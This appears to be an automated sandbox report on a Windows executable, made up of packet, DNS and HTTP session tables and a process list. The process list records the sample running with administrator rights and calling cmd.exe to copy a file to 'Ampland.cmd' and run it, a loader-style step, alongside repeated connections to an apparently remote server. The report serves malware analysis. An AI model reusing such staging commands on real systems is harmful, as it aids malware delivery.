                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.457890034 CET44349795162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.457964897 CET49795443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.458008051 CET44349794162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.458077908 CET49794443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.458368063 CET49795443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.458441019 CET44349795162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.458842993 CET49794443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.458914042 CET44349794162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.498418093 CET49795443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.498456955 CET44349795162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.514202118 CET49794443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.514245033 CET44349794162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.545392036 CET49795443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:23.560964108 CET49794443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:26.624772072 CET4434978492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:26.624849081 CET4434978492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:26.624898911 CET49784443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:26.624991894 CET49784443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:26.625011921 CET4434978492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:27.639333010 CET49811443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:27.639389038 CET4434981192.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:27.639472961 CET49811443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:27.639585972 CET49811443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:27.639595985 CET4434981192.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:29.094449997 CET4434981192.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:29.094521046 CET49811443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:29.099351883 CET49811443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:29.099375010 CET4434981192.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:29.099653959 CET4434981192.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:29.100408077 CET49811443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:29.143327951 CET4434981192.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:33.898289919 CET4434981192.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:33.898360014 CET4434981192.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:33.898415089 CET49811443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:33.898415089 CET49811443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:33.898463011 CET49811443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:33.898475885 CET4434981192.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:34.889431000 CET49827443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:34.889475107 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:34.889626980 CET49827443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:34.889727116 CET49827443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:34.889735937 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:36.344470024 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:36.344578028 CET49827443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:36.355881929 CET49827443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:36.355906010 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:36.356249094 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:36.358794928 CET49827443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:36.403326035 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:37.182111025 CET44349789162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:37.182187080 CET44349789162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:37.182302952 CET49789443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:37.182864904 CET44349790162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:37.182955027 CET44349790162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:37.183274031 CET49790443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:38.261174917 CET44349794162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:38.261174917 CET44349795162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:38.261248112 CET44349795162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:38.261272907 CET44349794162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:38.261342049 CET49794443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:38.261342049 CET49795443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:41.148652077 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:41.148734093 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:41.148806095 CET49827443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:41.148916960 CET49827443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:41.148935080 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:42.139596939 CET49844443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:42.139641047 CET4434984492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:42.139724016 CET49844443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:42.139949083 CET49844443192.168.2.1192.255.85.148
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.076926947 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.241441011 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.241533041 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.242069960 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.242173910 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.242624044 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.244028091 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.248584986 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.392837048 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.557852030 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.558018923 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.558049917 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.558079004 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.558439970 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.558515072 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.563371897 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.564213037 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.564280987 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.564482927 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.883038998 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.920705080 CET64379443192.168.2.11162.159.61.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 14:54:49.260854959 CET | 192.168.2.11 | 1.1.1.1 | 0x4a8 | Standard query (0) | msqMXFuLWSyMSfLTXxbcbTiF.msqMXFuLWSyMSfLTXxbcbTiF | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.640830994 CET | 192.168.2.11 | 1.1.1.1 | 0xea5e | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.641028881 CET | 192.168.2.11 | 1.1.1.1 | 0xb857 | Standard query (0) | time.cloudflare.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.641206980 CET | 192.168.2.11 | 1.1.1.1 | 0x4d75 | Standard query (0) | gbg1.ntp.se | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.641376972 CET | 192.168.2.11 | 1.1.1.1 | 0xb251 | Standard query (0) | time.facebook.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.642005920 CET | 192.168.2.11 | 1.1.1.1 | 0x8f30 | Standard query (0) | x.ns.gin.ntt.net | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.643083096 CET | 192.168.2.11 | 1.1.1.1 | 0x8238 | Standard query (0) | time-a-g.nist.gov | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.643486023 CET | 192.168.2.11 | 1.1.1.1 | 0x5116 | Standard query (0) | time.google.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.644414902 CET | 192.168.2.11 | 1.1.1.1 | 0xdfe1 | Standard query (0) | ntp.time.nl | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:38.451152086 CET | 192.168.2.11 | 1.1.1.1 | 0x44c8 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:38.451303005 CET | 192.168.2.11 | 1.1.1.1 | 0x9c26 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Dec 18, 2024 14:55:40.218100071 CET | 192.168.2.11 | 1.1.1.1 | 0x6844 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:40.218276024 CET | 192.168.2.11 | 1.1.1.1 | 0x84ad | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 18, 2024 14:55:40.218631029 CET | 192.168.2.11 | 1.1.1.1 | 0x79b1 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:40.218947887 CET | 192.168.2.11 | 1.1.1.1 | 0x46a5 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 14:54:49.492296934 CET | 1.1.1.1 | 192.168.2.11 | 0x4a8 | Name error (3) | msqMXFuLWSyMSfLTXxbcbTiF.msqMXFuLWSyMSfLTXxbcbTiF | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.777929068 CET | 1.1.1.1 | 192.168.2.11 | 0xb857 | No error (0) | time.cloudflare.com |  | 162.159.200.123 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.777929068 CET | 1.1.1.1 | 192.168.2.11 | 0xb857 | No error (0) | time.cloudflare.com |  | 162.159.200.1 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.778094053 CET | 1.1.1.1 | 192.168.2.11 | 0xea5e | No error (0) | time.windows.com | twc.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 14:55:18.778213978 CET | 1.1.1.1 | 192.168.2.11 | 0xb251 | No error (0) | time.facebook.com |  | 129.134.25.123 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.780349970 CET | 1.1.1.1 | 192.168.2.11 | 0x5116 | No error (0) | time.google.com |  | 216.239.35.0 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.780349970 CET | 1.1.1.1 | 192.168.2.11 | 0x5116 | No error (0) | time.google.com |  | 216.239.35.8 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.780349970 CET | 1.1.1.1 | 192.168.2.11 | 0x5116 | No error (0) | time.google.com |  | 216.239.35.12 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.780349970 CET | 1.1.1.1 | 192.168.2.11 | 0x5116 | No error (0) | time.google.com |  | 216.239.35.4 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.781783104 CET | 1.1.1.1 | 192.168.2.11 | 0x8238 | No error (0) | time-a-g.nist.gov |  | 129.6.15.28 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.879699945 CET | 1.1.1.1 | 192.168.2.11 | 0xdfe1 | No error (0) | ntp.time.nl |  | 94.198.159.10 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:18.879699945 CET | 1.1.1.1 | 192.168.2.11 | 0xdfe1 | No error (0) | ntp.time.nl |  | 94.198.159.14 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:19.295509100 CET | 1.1.1.1 | 192.168.2.11 | 0x8f30 | No error (0) | x.ns.gin.ntt.net |  | 129.250.35.250 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:19.514810085 CET | 1.1.1.1 | 192.168.2.11 | 0x4d75 | No error (0) | gbg1.ntp.se | gbg1.ntp.netnod.se |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 14:55:19.514810085 CET | 1.1.1.1 | 192.168.2.11 | 0x4d75 | No error (0) | gbg1.ntp.netnod.se |  | 194.58.203.20 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:31.688407898 CET | 1.1.1.1 | 192.168.2.11 | 0x3117 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 14:55:31.723547935 CET | 1.1.1.1 | 192.168.2.11 | 0xcae1 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 14:55:31.723547935 CET | 1.1.1.1 | 192.168.2.11 | 0xcae1 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net |  | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:38.589859962 CET | 1.1.1.1 | 192.168.2.11 | 0x9c26 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 14:55:38.592483044 CET | 1.1.1.1 | 192.168.2.11 | 0x44c8 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 14:55:38.592483044 CET | 1.1.1.1 | 192.168.2.11 | 0x44c8 | No error (0) | googlehosted.l.googleusercontent.com |  | 172.217.17.65 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:40.355413914 CET | 1.1.1.1 | 192.168.2.11 | 0x84ad | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
Dec 18, 2024 14:55:40.355633974 CET | 1.1.1.1 | 192.168.2.11 | 0x79b1 | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:40.355633974 CET | 1.1.1.1 | 192.168.2.11 | 0x79b1 | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:40.355921030 CET | 1.1.1.1 | 192.168.2.11 | 0x46a5 | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
Dec 18, 2024 14:55:40.356323004 CET | 1.1.1.1 | 192.168.2.11 | 0x6844 | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:55:40.356323004 CET | 1.1.1.1 | 192.168.2.11 | 0x6844 | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                                                        • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                        • chrome.cloudflare-dns.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49740 | 172.217.17.65 | 443 | 7804 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:40 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-18 13:55:41 UTC | 562 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                        Content-Length: 154477
                                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC7Wp0_qmiHPrlwjr02gMprMIqXGA2DRBwe1UsIGXWfQQZWyqRscU0kaHdksSMtvk-U
                                                                                                                                                                                                                                                                                                        X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                                        Date: Tue, 17 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                                        Expires: Wed, 17 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                        Age: 79046
                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                        ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49741 | 162.159.61.3 | 443 | 7804 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:55:41 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
2024-12-18 13:55:42 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 13:55:41 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f3fa6eab96743c4-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:42 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1d 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomHc)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49742 | 162.159.61.3 | 443 | 7804 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:55:41 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
2024-12-18 13:55:42 UTC  247                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 13:55:41 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f3fa6eab8d215c7-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400


Session ID: 3
Source IP: 192.168.2.11
Source Port: 49743
Destination IP: 162.159.61.3
Destination Port: 443
PID: 7804
Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 13:55:42 UTC  245                OUT        POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message


Session ID: 4
Source IP: 192.168.2.11
Source Port: 49744
Destination IP: 162.159.61.3
Destination Port: 443
PID: 7804
Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 13:55:42 UTC  245                OUT        POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message



Target ID: 0
Start time: 08:54:43
Start date: 18/12/2024
Path: C:\Users\user\Desktop\HI6VIJERUn.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\HI6VIJERUn.exe"
Imagebase: 0x400000
File size: 1'374'325 bytes
MD5 hash: 3DA674C87AA02F410B79109A2E5B1448
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 08:54:44
Start date: 18/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd
Imagebase: 0xc30000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 08:54:44
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff68cce0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID:4
Start time:08:54:46
Start date:18/12/2024
